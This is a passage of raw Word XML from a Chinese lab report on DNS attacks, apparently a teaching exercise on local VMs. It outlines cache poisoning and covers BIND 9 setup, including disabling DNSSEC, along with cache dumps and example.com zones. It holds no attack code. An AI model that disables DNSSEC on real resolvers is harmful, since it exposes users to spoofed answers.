          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击者植入假的地址到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DNS;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA05260" w14:textId="77777777" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>服务器缓存假地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D544651" w14:textId="30F622C3" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>流量被牵引到攻击者服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19863122" w14:textId="74BF3F18" w:rsidR="00852133" w:rsidRDefault="0081297F" w:rsidP="00554530">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc58529535"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r w:rsidR="00852133">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、实验</w:t>
      </w:r>
      <w:r w:rsidR="00CD4C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="26251A07" w14:textId="41F6709C" w:rsidR="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本实验的主要目的是针对</w:t>
      </w:r>
      <w:r>
        <w:t>DNS攻击，我们的攻击目标是本地DNS服务器。显然，攻击真实计算机是非法的，因此我们需要建立自己的DNS服务器来进行攻</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">击实验。实验室环境需要三台单独的计算机：一台用于受害者，一台用于DNS服务器，另一台用于攻击者。我们将在一台物理计算机上运行这三个虚拟机。所有这些VM将运行我们预先构建的Ubuntu VM映像。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0324B4" w14:textId="77777777" w:rsidR="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B1D5E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39DD53A8" wp14:editId="720E6DB9">
            <wp:extent cx="5274310" cy="2863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DE4" w14:textId="2A58B29B" w:rsidR="001B1D5E" w:rsidRDefault="001B1D5E" w:rsidP="001B1D5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环境设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A81FF" w14:textId="5A539D6E" w:rsidR="001B1D5E" w:rsidRDefault="0044386F" w:rsidP="009F7866">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc58529536"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="00863075">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00863075">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task1</w:t>
      </w:r>
      <w:r w:rsidR="001B1D5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：配置用户计算机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="54CB761A" w14:textId="53CCBAD2" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，我们在用户机上编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/resolvconf/resolv.conf.d/head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3CDFF" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="009F7866" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB9170E" wp14:editId="7AB67DBA">
            <wp:extent cx="3703641" cy="161558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EC84" w14:textId="78F10AD6" w:rsidR="009F7866" w:rsidRPr="009F7866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配置用户计算机的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF44E35" w14:textId="0B953C93" w:rsidR="001B1D5E" w:rsidRDefault="009F7866" w:rsidP="001B1D5E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，使用以下命令生效配置</w:t>
      </w:r>
      <w:r w:rsidR="00574460">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F0A9DB" w14:textId="010A556E" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> resolvconf -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641C062" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00405095" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1629A483" wp14:editId="6B86C9A1">
            <wp:extent cx="4902200" cy="52514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0880" w14:textId="51643C76" w:rsidR="00405095" w:rsidRPr="009F7866" w:rsidRDefault="00574460" w:rsidP="00574460">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF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生效配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A5673" w14:textId="0025A75E" w:rsidR="001B1D5E" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc5852953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Task2：设置本地DNS服务器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3F9275F9" w14:textId="2C6D1EA1" w:rsidR="009F7866" w:rsidRPr="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc58529538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Task2.1：</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:t>BIND 9服务器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="76D57DF4" w14:textId="6C3E0239" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，我们在</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/bind/named.conf.options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中添加以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8255E" w14:textId="6040CD2F" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dump-file "/var/cache/bind/dump.db";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02639CDD" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00405095" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DBC47E" wp14:editId="602C0EB9">
            <wp:extent cx="5266055" cy="17862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7538" w14:textId="4E432D2E" w:rsidR="00405095" w:rsidRPr="009F7866" w:rsidRDefault="00574460" w:rsidP="00574460">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF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BIND9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E4011" w14:textId="11167ADE" w:rsidR="00E420B9" w:rsidRDefault="009F7866" w:rsidP="001B1D5E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后使用以下指令进行缓存转储和缓存清除：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050133A" w14:textId="77777777" w:rsidR="009F7866" w:rsidRPr="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo rndc dumpdb -cache     # 转存缓存到指定文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26744867" w14:textId="7A42FAC0" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo rndc flush             # 清空缓存文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBCDDC" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00405095" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72310E65" wp14:editId="7D0B8628">
            <wp:extent cx="4436745" cy="643255"/>
            <wp:effectExtent l="0" t="0" r="190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9C4C" w14:textId="0E3E3069" w:rsidR="00405095" w:rsidRDefault="00574460" w:rsidP="00574460">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF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缓存转储与清除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF2FE8F" w14:textId="278EF1D5" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc58529539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Task2.2：</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:t>DNSSEC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="31E03380" w14:textId="6CD19936" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:t>DNSSEC 应该是一种防止 DNS 服务器遭受 spoofing attcks 的防御措施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们需要在</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上文的</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:t xml:space="preserve"> named.conf.options 文件, 找到并注释: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dnssec-validation auto;</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:t xml:space="preserve">, 添加 </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dnssec-enable no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CF34F" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00405095" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C950DE8" wp14:editId="745AB986">
            <wp:extent cx="3894455" cy="86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9D76" w14:textId="1D28AF38" w:rsidR="00405095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6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F468E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="002F468E">
        <w:t>DNSSEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAADBAB" w14:textId="4D7AE29A" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc58529540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Task2.3：</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="009F7866">
        <w:t>DNS服务器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7E540190" w14:textId="44DFD7A3" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用以下命令启动DNS服务器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A605E62" w14:textId="3BE435E2" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7866">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo service bind9 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBDE6DB" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00405095" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB820FD" wp14:editId="45C02308">
            <wp:extent cx="3522345" cy="169545"/>
            <wp:effectExtent l="0" t="0" r="190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FA11" w14:textId="3C81D732" w:rsidR="00405095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0AB0B9D8" w14:textId="434EF5B6" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc58529541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Task2.4：使用DNS服务器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="47352920" w14:textId="584F3878" w:rsidR="009F7866" w:rsidRDefault="009F7866" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们在受害机中尝试去ping百度，并用Wire Shark抓包进行观察：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702FC3C" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00405095" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208E5267" wp14:editId="3015978F">
            <wp:extent cx="5232400" cy="9906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3825" w14:textId="35C0987B" w:rsidR="009F7866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baidu</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594FA27" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="00D11A11" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39BCED46" wp14:editId="05228BE4">
            <wp:extent cx="5274310" cy="766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6AA" w14:textId="34442555" w:rsidR="009F7866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WireShark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5BABAD" w14:textId="15E9FB1A" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:t xml:space="preserve"> wireshark 上看见 DNS Server 和用户之间的数据交换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52D675" w14:textId="41A174BA" w:rsidR="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc5852954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Task3：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:t>DNS服务器中托管区域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6A07D3AB" w14:textId="5D10F324" w:rsidR="00D11A11" w:rsidRPr="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设我们拥有一个域，我们将负责提供有关该域的明确答案。我们将使用本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:t>DNS服务器作为域的权威名称服务器。在本实验中，我们将为example.com域</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:lastRenderedPageBreak/>
        <w:t>设置一个权威服务器。该域名保留供文档使用，不归任何人所有，因此可以安全使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71203A77" w14:textId="6DCCDA68" w:rsidR="009F7866" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc58529543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Task3.1：创建区域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="66E3B373" w14:textId="467CA581" w:rsidR="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，我们向</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/bind/named.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入如下数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F0AC4B" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="001B4A3C" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5749329B" wp14:editId="3E46B6AD">
            <wp:extent cx="4351655" cy="20745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FA9" w14:textId="073D13A3" w:rsidR="00D11A11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创建区域</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB278F" w14:textId="68EA9D3C" w:rsidR="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc58529544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Task3.2：设置正向查找区域文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0B9EF758" w14:textId="68092F5C" w:rsidR="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后输入以下内容到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/bind/example.com.db</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476FB96" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="001B4A3C" w:rsidP="0057446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8A96C31" wp14:editId="417FE37A">
            <wp:extent cx="5274945" cy="2379345"/>
            <wp:effectExtent l="0" t="0" r="190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CF5D" w14:textId="3EE3AEF6" w:rsidR="00D11A11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1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A7F4A">
        <w:t>/etc/bind/example.com.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5F98BB" w14:textId="7AE4F104" w:rsidR="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc58529545"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task3.3：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置反向查找区域文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3E03F5BE" w14:textId="38F7603A" w:rsidR="00D11A11" w:rsidRPr="00D11A11" w:rsidRDefault="00D11A11" w:rsidP="00D11A11">
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入反向解析文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/bind/192.168.0.db</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FA1D7" w14:textId="77777777" w:rsidR="00574460" w:rsidRDefault="001B4A3C" w:rsidP="00574460">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
